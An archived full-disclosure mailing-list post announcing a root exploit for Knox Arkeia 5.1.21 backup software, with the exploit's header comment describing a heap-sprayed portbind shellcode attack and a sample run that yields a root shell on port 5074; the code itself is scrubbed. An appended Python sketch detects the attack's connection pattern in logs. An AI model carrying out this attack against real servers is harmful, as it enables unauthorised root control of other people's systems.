From: bugtraq_vuln at yahoo.com (A. C.)
Subject: Knox Arkeia 5.1.21 local/remote root exploit

Exploit attached for Knox Arkeia Pro v5.1.21 backup software from
http://www.arkeia.com.

/*
 * Knox Arkeia arkiead local/remote root exploit.
 *
 * Portbind 5074 shellcode
 *
 * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.
 *
 * NULLs out least significant byte of EBP to pull EIP out of overflow buffer.
 * A previous request forces a large allocation of NOP's + shellcode in heap
 * memory. Find additional targets by searching the heap for NOP's after a
 * crash. safeaddr must point to any area of memory that is read/writable
 * and won't mess with program/shellcode flow.
 *
 * ./ark_sink host targetnum
 * [user@...t dir]$ ./ark_sink 192.168.1.2 1
 * [*] Connected to 192.168.1.2:617
 * [*] Connected to 192.168.1.2:617
 * [*] Sending nops+shellcode
 * [*] Done, sleeping
 * [*] Sending overflow
 * [*] Done
 * [*] Sleeping and connecting remote shell
 * [*] Connected to 192.168.1.2:5074
 * [*] Success, enjoy
 * id
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 *
 */

-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: ark_sink.c
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030919/ab22d1b4/ark_sink.c
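
Added example, not part of the original post or of the attached ark_sink.c: the transcript above shows connections to TCP 617 followed shortly by a connection to TCP 5074 on the same host, and this sketch flags that sequence in connection logs. The log format, the 120-second window, the sample lines and all function names are assumptions made for illustration.

```python
import re
from datetime import datetime, timedelta

ARKEIA_PORT = 617       # arkeiad service port seen in the post's transcript
BINDSHELL_PORT = 5074   # port the posted shellcode binds a shell to
WINDOW = timedelta(seconds=120)  # assumed correlation window, tune per site

# Constructed sample flow log (assumed format): "<ISO time> <src> -> <dst>:<port>"
SAMPLE_LOG = """\
2003-09-19T10:00:01 10.0.0.5 -> 192.168.1.2:617
2003-09-19T10:00:01 10.0.0.5 -> 192.168.1.2:617
2003-09-19T10:00:09 10.0.0.5 -> 192.168.1.2:5074
2003-09-19T10:05:00 10.0.0.7 -> 192.168.1.3:617
2003-09-19T11:30:00 10.0.0.9 -> 192.168.1.3:5074
2003-09-19T12:00:00 10.0.0.8 -> 192.168.1.4:5074
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+->\s+(\S+):(\d+)$")

def parse(log):
    """Yield (time, src, dst, port) for each well-formed line; skip the rest."""
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, src, dst, port = m.groups()
            yield datetime.fromisoformat(ts), src, dst, int(port)

def find_suspect_sequences(log, window=WINDOW):
    """Flag hosts that accept a connection on 5074 soon after one on 617."""
    last_arkeia = {}  # dst host -> (time, src) of most recent connection to 617
    alerts = []
    for ts, src, dst, port in sorted(parse(log)):
        if port == ARKEIA_PORT:
            last_arkeia[dst] = (ts, src)
        elif port == BINDSHELL_PORT and dst in last_arkeia:
            seen, arkeia_src = last_arkeia[dst]
            # Keyed on the destination only: the second connection may come
            # from a different source address than the first.
            if ts - seen <= window:
                alerts.append({"host": dst, "arkeia_src": arkeia_src,
                               "shell_src": src,
                               "delay_seconds": int((ts - seen).total_seconds())})
    return alerts

if __name__ == "__main__":
    for alert in find_suspect_sequences(SAMPLE_LOG):
        print(alert)
```

A listener on 5074 on a backup server that does not normally expose that port is worth investigating even without the preceding connection to 617.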